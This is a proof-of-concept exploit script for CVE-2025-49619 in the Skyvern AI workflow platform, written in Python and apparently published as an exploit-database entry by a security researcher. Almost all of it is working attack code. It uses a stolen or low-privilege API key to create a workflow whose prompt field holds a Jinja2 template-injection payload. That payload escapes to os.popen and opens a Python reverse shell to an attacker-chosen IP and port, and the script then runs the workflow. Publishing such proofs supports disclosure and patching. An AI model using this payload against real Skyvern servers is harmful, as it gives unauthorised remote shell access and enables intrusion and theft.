# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI # Date: 2025-06-15 # Exploit Author: Cristian Branet # Vendor Homepage: https://www.skyvern.com/ # Software Link: https://github.com/Skyvern-AI/skyvern # Version: < 0.1.85, before commit db856cd # Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04) # CVE : CVE-2025-49619 # Article: https://cristibtz.github.io/posts/CVE-2025-49619/ ''' Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax. An attacker with low privileges can inject a malicious payload in a block that contains Prompt section, which gets rendered server-side, resulting in blind remote code execution via curl. ''' import requests, argparse, pyfiglet parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)") parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key") parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection") parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection") def create_exploit_workflow(url, ip, port, x_api_key): exploit_workflow = { "title": "Exploit", "description": "", "proxy_location": "RESIDENTIAL", "webhook_callback_url": "", "persist_browser_session": False, "model": None, "totp_verification_url": None, "workflow_definition": { "parameters": [], "blocks": [ { "label": "block_1", "continue_on_failure": False, "block_type": "task_v2", "prompt": ( "{% for x in ().__class__.__base__.__subclasses__() %}\n" " {% if 'warning' in x.__name__ %}\n" " {{ x()._module.__builtins__['__import__']('os').popen(\n" " \"python3 -c 'import socket,os,pty;\"\n" " \"s=socket.socket();\"\n" f" \'s.connect((\\\"{ip}\\\",{port}));\'\n" " \"os.dup2(s.fileno(),0);\"\n" " \"os.dup2(s.fileno(),1);\"\n" " \"os.dup2(s.fileno(),2);\"\n" " \"pty.spawn(\\\"sh\\\")'\"\n" " ).read() }}\n" " {% endif %}\n" "{% endfor %}" ), "url": "", "max_steps": 25, "totp_identifier": None, "totp_verification_url": None } ] }, "is_saved_task": False } headers = { "Content-Type": "application/json", "X-API-Key": x_api_key } response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers) if response.status_code == 200: print("[+] Exploit workflow created successfully!") else: print("[-] Failed to create exploit workflow:", response.text) return None workflow_permanent_id = response.json().get("workflow_permanent_id") print(f"[+] Workflow Permanent ID: {workflow_permanent_id}") return workflow_permanent_id def run_exploit_workflow(url, x_api_key, workflow_permanent_id): workflow_data = { "workflow_id": workflow_permanent_id } headers = { "Content-Type": "application/json", "X-API-Key": x_api_key } response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers) if response.status_code == 200: print("[+] Exploit workflow executed successfully!") else: print("[-] Failed to execute exploit workflow:", response.text) if __name__=="__main__": print("\n") print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100)) print("Author: Cristian Branet") print("GitHub: github.com/cristibtz") print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.") print("\n") args = parser.parse_args() url = args.url x_api_key = args.x_api_key ip = args.ip port = args.port workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key) run_exploit_workflow(url, x_api_key, workflow_permanent_id)